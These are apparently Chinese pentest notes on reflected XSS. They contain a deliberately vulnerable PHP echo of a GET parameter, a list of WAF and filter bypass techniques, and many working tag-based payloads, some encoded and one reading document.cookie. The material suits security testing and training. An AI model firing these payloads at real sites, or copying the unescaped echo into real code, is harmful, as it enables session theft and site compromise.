測試代碼:
<?php
//XSS反射型漏洞
//1.變量的直接輸出
echo $_GET['XSS'];
?>
標簽
先對標簽進行測試
<script> <a> <p> <img> <body> <button> <var> <div> <iframe> <object> <input>
<textarea> <keygen> <frameset> <embed> <svg> <math> <video> <audio> <select>
繞過方法
可以彈窗的:alert,prompt ,confirm,base64加密,編碼繞過(安全狗都沒有過濾)
繞過方法有很多比如:
- 大小寫繞過
- javascript偽協議
- 沒有分號
- Flash
- HTML5 新標簽
- Fuzz進行測試
- 雙層標簽繞過
audio標簽
<audio src=x onerror=alert(47)>
<audio src=x onerror=prompt(1);>
<audio src=1 href=1 onerror="javascript:alert(1)"></audio>
video標簽
<video src=x onerror=prompt(1);>
<video src=x onerror=alert(48)>
div標簽
<div style="width:expression(alert(/1/))">1</div> ie瀏覽器執行
<div onmouseover%3d'alert%26lpar%3b1%26rpar%3b'>DIV<%2fdiv> url編碼繞過
math標簽
<math><a/xlink:href=javascript:prompt(1)>Xss
<math href="javascript:javascript:alert(1)">Xss</math>
button標簽
<button onfocus=alert(1) autofocus>
<button/onclick=alert(1) >xss</button>
keygen標簽
<keygen/onfocus=prompt(1);>
<keygen onfocus=javascript:alert(1) autofocus>
object標簽
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
base64加密:PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg
解碼:<script>alert(1)</script>
iframe標簽
<IFRAME width%3d"420" height%3d"315" frameborder%3d"0" onload%3d"alert(document.cookie)"><%2fIFRAME>
<iframe%2fsrc%3d"data%3atext%2fhtml%3b%26Tab%3bbase64%26Tab%3b,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg%3d%3d">
<iframe srcdoc%3d'%26lt%3bbody onload%3dprompt%26lpar%3b1%26rpar%3b%26gt%3b'>
不全有空再加